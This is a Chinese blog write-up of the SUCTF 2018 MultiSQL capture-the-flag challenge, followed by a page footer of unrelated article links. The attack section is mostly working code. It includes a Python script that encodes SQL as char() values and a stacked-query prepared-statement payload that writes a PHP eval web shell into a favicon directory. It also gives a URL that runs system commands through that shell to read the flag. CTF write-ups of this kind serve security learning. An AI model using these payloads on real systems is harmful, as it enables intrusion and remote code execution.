首页 > 数据库 >[SUCTF 2018]MultiSQL1

[SUCTF 2018]MultiSQL1

时间:2023-10-25 23:55:20浏览次数:39  
标签:SUCTF 32 MultiSQL1 112 108 116 2018 47 101

0x01注入点发现
登录,注册页面都尝试了一下,没有可以注入的地方
但是获取了有一个比较关键的信息:admin是其中已经存在的一个用户
按照正常流程注册登录:

注意url中的id值,修改id=1之后:

可以猜测,id是有一个get注入点。
0x02注入类型判断
可堆叠注入和过滤(select,union)是怎么看出来的??

堆叠注入写入文件为什么要往/var/www/html/favicon/写?
favicon通过头像文件上传可以知道有写入权限

完整路径是如何获得的?

只可以知道相对路径
0x03用预处理写shell
生成shll代码:

str="select '<?php @eval($_GET[1]);?>' into outfile '/var/www/html/favicon/sh3ll.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

shellcode:
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,64,101,118,97,108,40,36,95,71,69,84,91,49,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,51,108,108,46,112,104,112,39,59)
payload:
1;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,64,101,118,97,108,40,36,95,71,69,84,91,49,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,51,108,108,46,112,104,112,39,59);prepare payload from @sql;execute payload;
get flag:
http://c75b3596-2d85-4bca-9e6d-ac9695e0d927.node4.buuoj.cn:81/favicon/sh3ll.php?1=system('cd /;cat WelL_Th1s_14_fl4g');
0x04Tips
1.学习预处理:https://www.cnblogs.com/geaozhang/p/9891338.html

标签:SUCTF,32,MultiSQL1,112,108,116,2018,47,101
From: https://www.cnblogs.com/J0ck3r/p/17783757.html

相关文章

  • USACO2018(铂金组)
    前言:教练给我们做铂金组的题目真的抬举我们了……[USACO18OPEN]DisruptionP题目描述:你有一棵节点数为\(n\),边数为\(n-1\)的树。然后你会给这棵树新增加\(m\)条边,对于每条边,有\(u,v,w\)分别表示边连接的两个节点分别为\(u\)和\(v\),和一个边权\(w\)。每次删掉一条......
  • Premiere CC2018 Mac汉化版「Pr 常用视频编辑软件」附汉化补丁
    Premierecc2018mac版是Adobe公司开发的一款可以在Mac系统上运行的常用视频编辑软件。作为行业数一数二的视频编辑软件,Prcc2018mac版提供了剪辑、调色、采集、美化音频、字幕添加、输出、DVD刻录的一整套流程,并且与其他的Adobe软件高效集成,使用户可以在编辑、制作、以及工作流上......
  • 【洛谷 8665】[蓝桥杯 2018 省 A] 航班时间
    #[蓝桥杯2018省A]航班时间##题目描述小h前往美国参加了蓝桥杯国际赛。小h的女朋友发现小h上午十点出发,上午十二点到达美国,于是感叹到“现在飞机飞得真快,两小时就能到美国了”。小h对超音速飞行感到十分恐惧。仔细观察后发现飞机的起降时间都是当地时间。由于北京......
  • [BJWC2018] 序列合并
    朴素的\(O(n^4)\)是容易的,考虑如何优化,通过一些观察可以发现\(\texttt{dp}\)不具有凸性和决策单调性,所以只能用普通的矩阵乘法来优化,我们令\(\texttt{dp}\)数组构成的矩阵为\(A\),那么\(dp_{l,r}\)则可以从所有\(L\leqslantx\leqslantR\)的\(A^x\)转移而来,我们采用......
  • 软考系列(系统架构师)- 2018年系统架构师软考案例分析考点
    试题一软件架构(非功能性需求、C/S架构)【问题1】(8分)在系统架构设计中,决定系统架构设计的非功能性需求主要有四类:操作性需求、性能需求、安全性需求和文化需求。请简要说明四类需求的含义。(1)操作性需求:指系统完成任务所需的操作环境要求及如何满足系统将来可能的需求变更的......
  • NOIP2018PJ T3 摆渡车(2023.10第二版题解)
    题目链接 题意:时间轴上分布着$n$位乘客($1\len\le500$),$i$号乘客的位置为$t_i$(0\let_i\le4\times10^6),用互相距离不小于$m$的车次将时间轴分为若干部分,并管辖以自己为右端点的这个区间(除了第一趟车包括$0$,其他车次左开右闭),求最小费用和。每个车次的费用来自:管辖区间内所......
  • P4899 [IOI2018] werewolf 狼人 题解
    P4899[IOI2018]werewolf狼人题解题目描述省流:\(n\)个点,\(m\)条边,\(q\)次询问,对于每一次询问,给定一个起点\(S\)和终点\(T\),能否找到一条路径,前半程不能走\(0\thicksimL-1\)这些点,后半程不能走\(R+1\thicksimN-1\)这些点。中途必须有一个点在\(L\thicksimR\)之......
  • P5018 [NOIP2018 普及组] 对称二叉树
    先递归判断当前子树是不是对称二叉树,如果是就取\(\max\)然后退出,否则继续递归左儿子的左子树和右儿子的右子树、左儿子的右子树和右儿子的左子树判断。最坏情况是每次都递归到叶子,也就是每层都是\(O(n)\)。但一共只有\(O(\logn)\)层,所以时间复杂度是\(O(n\logn)\)。......
  • CItect2018 R2过程分析器显示不了曲线
    这一篇博客我在新浪博客记录过,在这里也记录一遍,新浪博客地址是CItect2018R2过程分析器显示不了曲线_来自金沙江的小鱼_新浪博客(sina.com.cn)这两天在现场遇到奇怪的现象,CITECT2018R2的过程分析器显示不了曲线,如果在线运行时在过程分析器添加一个趋势笔,那么所有曲线就能立马显示......
  • P1612 [yLOI2018] 树上的链 题解
    思路看到条件\(2\),我们得知:这个节点对应的最长链,一定在这个节点到根节点的简单路径上。所以我们记录\(1\)到\(i\)之间的权值和,记为\(sum_i\)。因为权值是正整数,所以满足单调性,可以二分。如何二分路径上的点呢?我们维护一个与当前dfs同步的栈,记录从根节点到当前节点的简......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99